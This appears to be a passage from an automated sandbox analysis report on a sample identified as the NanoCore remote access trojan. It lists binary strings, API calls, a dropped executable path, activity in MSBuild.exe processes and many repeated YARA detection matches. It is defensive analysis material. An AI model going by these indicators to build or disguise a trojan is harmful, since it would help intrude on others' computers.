        Source: qnJXJsqt1M.exeString found in binary or memory: This is a third-party compiled AutoIt script.
        Source: qnJXJsqt1M.exe, 00000000.00000000.229366699.0000000000B7E000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: znytpstdcrwsisx.exeString found in binary or memory: This is a third-party compiled AutoIt script.
        Source: znytpstdcrwsisx.exe, 0000000B.00000000.259387793.0000000000DFE000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: qnJXJsqt1M.exeString found in binary or memory: This is a third-party compiled AutoIt script.
        Source: qnJXJsqt1M.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_054214FA NtQuerySystemInformation,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_054214BF NtQuerySystemInformation,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B16685: CreateFileW,DeviceIoControl,CloseHandle,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B179D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00ADE3B0
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AFB043
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEB11F
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AE3200
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AE3B70
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0410F
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AF02A4
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0038E
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AF06D9
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0467F
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B3AACE
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B04BEF
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AFCCC1
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AD6F07
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00ADAF50
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B331BC
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AFD1B9
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AF123A
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0724D
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AD93F0
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B113CA
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEF563
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AD96C0
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1B6CC
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AD77B0
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B3F7FF
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B079C9
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_05303850
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_053023A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_05302FA8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_05309278
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_05308678
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_0530AED8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_0530306F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_0530933F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_05309B20
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_053032BB
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 5_2_02C60708
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D63200
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D5E3B0
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D7B043
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D8410F
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D84BEF
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D59B60
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D6F563
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D79ED0
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D577B0
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D56F07
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_05743850
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057423A0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_05742FA8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_0574306F
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: String function: 00AEEC2F appears 63 times
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: String function: 00AF6AC0 appears 32 times
        Source: qnJXJsqt1M.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: qnJXJsqt1M.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: qnJXJsqt1M.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: qnJXJsqt1M.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: znytpstdcrwsisx.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: znytpstdcrwsisx.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: znytpstdcrwsisx.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: znytpstdcrwsisx.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: qnJXJsqt1M.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
        Source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000001.00000002.507018944.0000000005610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000001.00000002.507018944.0000000005610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
